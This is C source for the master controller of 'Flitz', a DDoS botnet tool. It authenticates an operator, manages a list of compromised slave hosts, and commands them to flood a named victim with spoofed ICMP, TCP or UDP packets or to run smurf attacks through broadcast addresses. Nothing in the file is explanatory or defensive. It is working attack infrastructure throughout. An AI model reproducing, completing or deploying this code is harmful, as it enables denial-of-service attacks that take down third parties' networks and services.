


#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include "Flitz.h"
#include "Flitz-master.h"
#include "func.h"
#include "net.h"
#include "parse.h"
#include "slavelist.h"



static struct {
    char *type;
    void (*func)(int, char *);
} cmds[] = {
    { "exit", cmds_exit },
    { "help", cmds_help },
    { "set", cmds_set },
    { "settings", cmds_settings },
    { "shutdown", cmds_shutdown },

    { "add", cmds_add },
    { "del", cmds_del },
    { "ping", cmds_ping },
    { "save", cmds_save },
    { "slavelist", cmds_slavelist },

    { "icmp", cmds_icmp },
    { "tcp", cmds_tcp },
    { "udp", cmds_udp },
    { "icmpsmurf", cmds_icmpsmurf },
    { "stop", cmds_stop },
    { NULL, NULL }
};



void cmds_exit(int nr, char *line)
{
    net_close(nr);
    return;
}



void cmds_help(int nr, char *line)
{
    net_send(nr, "\n\nBASIC COMMANDS:\n");
    net_send(nr, "======================================================");
    net_send(nr, "==========================\n");
    net_fsend(nr, "exit", "disconnects you.");
    net_fsend(nr, "help", "prints out this menu.");
    net_fsend(nr, "set <keyword> <value>",
             "assigns a new value to a setting.");
    net_fsend(nr, "settings", "lists current settings.");
    net_fsend(nr, "shutdown", "shutdowns the master.");
    net_send(nr, "\n\nSLAVE LIST COMMANDS:\n");
    net_send(nr, "======================================================");
    net_send(nr, "==========================\n");
    net_fsend(nr, "add <ip|hostname>",
              "adds a new slave to your slave list.");
    net_fsend(nr, "del <number>",
              "kills and removes slave from your slave list.");
    net_fsend(nr, "ping", "pings all slaves.");
    net_fsend(nr, "save", "saves current slave list to file.");
    net_fsend(nr, "slavelist", "prints out slave list.");
    net_send(nr, "\n\nDOS COMMANDS:\n");
    net_send(nr, "======================================================");
    net_send(nr, "==========================\n");
    net_fsend(nr, "icmp <victim> <spoof>",
              "floods victim with spoofed icmp packets.");
    net_fsend(nr, "tcp <victim> <spoof>",
              "tcpfloods victim with spoofed packets.");
    net_fsend(nr, "udp <victim> <spoof>",
              "floods victim with spoofed udp packets.");
    net_fsend(nr, "icmpsmurf <victim>",
              "smurfs victim using default BC list.");
    net_fsend(nr, "stop", "stops flooding\n\n");
    return;
}



void cmds_set(int nr, char *line)
{
    int value;
    char *name, *arg;

    if ((name = func_chop(&line)) != NULL) {
        if ((arg = func_chop(&line)) != NULL) {
            value = atoi(arg);
            if (func_scmp("verbose", name) == 1) {
                if (value == 0) {
                    setting.verbose = OFF;
                    net_fsend(nr, "Verbose Slave (verbose)",
                              "%-10d", 0);
                }
                else if (value == 1) {
                    setting.verbose = ON;
                    net_fsend(nr, "Verbose Slave (verbose)",
                              "%-10d", 1);
                }
                else {
                    net_send(nr, "Invalid argument.\n");
                }
                return;
            }
            else if (func_scmp("delay", name) == 1) {
                if (value >= 0) {
                    setting.dos_delay = value;
                    net_fsend(nr, "Packet Delay (delay)",
                              "%-10d (usec)", value);
                }
                else {
                    net_send(nr, "Invalid argument.\n");
                }
                return;
            }
            else if (func_scmp("size", name) == 1) {
                if (value >= 0 && value < 65000) {
                    setting.dos_size = value;
                    net_fsend(nr, "Packet Payload Size (size)",
                              "%-10d (octets)", value);
                }
                else {
                    net_send(nr, "Invalid argument.\n");
                }
                return;
            }
            else if (func_scmp("time", name) == 1) {
                if (value >= 0) {
                    setting.dos_time = value;
                    net_fsend(nr, "Packet Time (time)", "%-10d (sec)", value);
                }
                else {
                    net_send(nr, "Invalid argument.\n");
                }
                return;
            }
            else {
                net_send(nr, "No such setting.\n");
                return;
            }
        }
    }
    net_send(nr, "Not enough arguments.\n");
    return;
}



void cmds_settings(int nr, char *line)
{
    net_send(nr, "\n\nCURRENT SETTINGS:\n");
    net_send(nr, "======================================================");
    net_send(nr, "==========================\n");
    net_fsend(nr, "Verbose Slave (verbose)", "%-10d (0=off,1=on)",
              setting.verbose);
    net_fsend(nr, "Packet Delay (delay)", "%-10d (usec)", setting.dos_delay);
    net_fsend(nr, "Packet Payload Size (size)", "%-10d (octets)",
              setting.dos_size);
    net_fsend(nr, "Packet Time (time)", "%-10d (sec)", setting.dos_time);
    return;
}



void cmds_shutdown(int nr, char *line)
{
    slavelist_file_write();
    exit(0);
}



void cmds_add(int nr, char *line)
{
    char *ip;

    if ((ip = func_chop(&line)) != NULL) {
        slavelist_add(nr, ip);
        return;
    }
    net_send(nr, "Not enough arguments.\n");
    return;
}



void cmds_del(int nr, char *line)
{
    int nummer;
    char *arg;

    if ((arg = func_chop(&line)) != NULL) {
        if ((nummer = atoi(arg)) > 0) {
            slavelist_del(nr, nummer);
            return;
        }
        net_send(nr, "Invalid argument.\n");
    }
    net_send(nr, "Not enough arguments.\n");
    return;
}



void cmds_ping(int nr, char *line)
{
    net_send(nr, "Sending ping to all slaves...\n");
    slavelist_pall();
    return;
}



void cmds_save(int nr, char *line)
{
    slavelist_file_write();
    net_send(nr, "Slaves saved to \"%s\".\n", SLAVE_LIST);
    return;
}



void cmds_slavelist(int nr, char *line)
{
    slavelist_printlist(nr);
    return;
}



void cmds_icmp(int nr, char *line)
{
    char *victim, *spoof;

    if ((victim = func_chop(&line)) == NULL ||
        (spoof = func_chop(&line)) == NULL) {
        net_send(nr, "Not enough arguments.\n");
        return;
    }
    if (func_resolve(victim) == 0) {
        net_send(nr, "Can't resolve victim.\n");
        return;
    }
    net_send(nr, "Sending icmp flood command to all slaves...\n");
    slavelist_sendsetting();
    slavelist_wall("100 %s %s %s\n", PASS_SLAVE, victim, spoof);
    return;
}



void cmds_tcp(int nr, char *line)
{
    char *victim, *spoof;

    if ((victim = func_chop(&line)) == NULL ||
        (spoof = func_chop(&line)) == NULL) {
        net_send(nr, "Not enough arguments.\n");
        return;
    }
    if (func_resolve(victim) == 0) {
        net_send(nr, "Can't resolve victim.\n");
        return;
    }
    net_send(nr, "Sending tcp flood command to all slaves...\n");
    slavelist_sendsetting();
    slavelist_wall("101 %s %s %s\n", PASS_SLAVE, victim, spoof);
    return;
}



void cmds_udp(int nr, char *line)
{
    char *victim, *spoof;

    if ((victim = func_chop(&line)) == NULL ||
        (spoof = func_chop(&line)) == NULL) {
        net_send(nr, "Not enough arguments.\n");
        return;
    }
    if (func_resolve(victim) == 0) {
        net_send(nr, "Can't resolve victim.\n");
        return;
    }
    net_send(nr, "Sending udp flood command to all slaves...\n");
    slavelist_sendsetting();
    slavelist_wall("102 %s %s %s\n", PASS_SLAVE, victim, spoof);
    return;
}



void cmds_icmpsmurf(int nr, char *line)
{
    char ip[256];
    char *victim;
    FILE *bc;

    if ((victim = func_chop(&line)) == NULL) {
        net_send(nr, "Not enough arguments.\n");
        return;
    }
    if (func_resolve(victim) == 0) {
        net_send(nr, "Can't resolve victim.\n");
        return;
    }
    if ((bc = fopen(BC_LIST, "r")) == 0) {
        net_send(nr, "Can't open broadcast list.\n");
        return;
    }
    net_send(nr, "Switching off verbose mode, due to a large number ");
    net_send(nr, "of jobs.\n");
    net_send(nr, "Sending icmp smurf command to all slaves...\n");
    setting.verbose = OFF;
    slavelist_sendsetting();

    memset(&ip, 0x00, sizeof(ip));
    while (fgets(ip, 256, bc) != NULL) {
        if (ip[strlen(ip) - 1] == '\n') {
            ip[strlen(ip) - 1] = '\0';
        }
        slavelist_wall("100 %s %s %s\n", PASS_SLAVE, ip, victim);
        memset(&ip, 0x00, sizeof(ip));
    }
    fclose(bc);
    return;
}



void cmds_stop(int nr, char *line)
{
    net_send(nr, "Sending stop flood command to all slaves...\n");
    slavelist_wall("199 %s\n", PASS_SLAVE);
    return;
}



int parse_master(int nr, int auth, char *line)
{
    int i;
    char *cmd;

    if (auth == 0) {
        if (func_scmp(line, PASS_MASTER)) {
            net_send(nr, "\n\e[0;34m[ Flitz: Distributed Denial of Service ");
            net_send(nr, "(master) by: ");
            net_send(nr, "Xphere    --    #phreak.nl ]\e[0m\n\n\n");
            net_send(nr, "Welcome to Flitz DDoS %s.\n\n", VERSION);
            net_send(nr, "Type \"ping\" now to refresh the slave list.\n");
            net_send(nr, "Type \"help\" for a listing of the available ");
            net_send(nr, "commands.\n");
            net_send(nr, "\e[0;34m[\e[0m Flitz %s \e[0;34m>\e[0m ", VERSION);
            return(1);
        }
        else {
            return(0);
        }
    }

    if ((cmd = func_chop(&line)) != NULL) {
        for (i = 0; cmds[i].type != NULL; ++i) {
            if (func_scmp(cmds[i].type, cmd) == 1) {
                cmds[i].func(nr, line);
                break;
            }
        }
        if (cmds[i].type == NULL) {
            net_send(nr, "%s: command not found.\n", cmd);
        }
    }
    net_send(nr, "\e[0;34m[\e[0m Flitz %s \e[0;34m>\e[0m ", VERSION);
    return(1);
}



void parse_slave(unsigned long ip, char *line)
{
    int nr;
    char *code, *arg;
    struct sockaddr_in addr;

    memset(&addr, 0x00, sizeof(struct sockaddr_in));
    if ((code = func_chop(&line)) != NULL) {
        if (func_scmp(code, "100") == 1) {
            if ((arg = func_chop(&line)) != NULL) {
                nr = atoi(arg);
                addr.sin_family = AF_INET;
                addr.sin_addr.s_addr = ip;
                if (setting.verbose == ON) {
                    net_wall("\rReceived reply: slave (%d) at %s is online.\n",
                             nr, inet_ntoa(addr.sin_addr));
                }
                slavelist_online(nr);
            }
        }
        else if (func_scmp(code, "101") == 1) {
            addr.sin_family = AF_INET;
            addr.sin_addr.s_addr = ip;
            if (setting.verbose == ON) {
                net_wall("\rReceived message: slave at %s accepted a job.\n",
                         inet_ntoa(addr.sin_addr));
            }
        }
        else if (func_scmp(code, "102") == 1) {
            addr.sin_family = AF_INET;
            addr.sin_addr.s_addr = ip;
            if (setting.verbose == ON) {
                net_wall("\rReceived message: slave at %s finished a job.\n",
                         inet_ntoa(addr.sin_addr));
            }
        }
        else if (func_scmp(code, "103") == 1) {
            addr.sin_family = AF_INET;
            addr.sin_addr.s_addr = ip;
            if (setting.verbose == ON) {
                net_wall("\rReceived message: slave at %s stopped all jobs.\n",
                         inet_ntoa(addr.sin_addr));
            }
        }
        else {
            if (setting.verbose == ON) {
                net_wall("\rUnknown message: %s %s\n", code, line);
            }
        }
    }
    return;
}
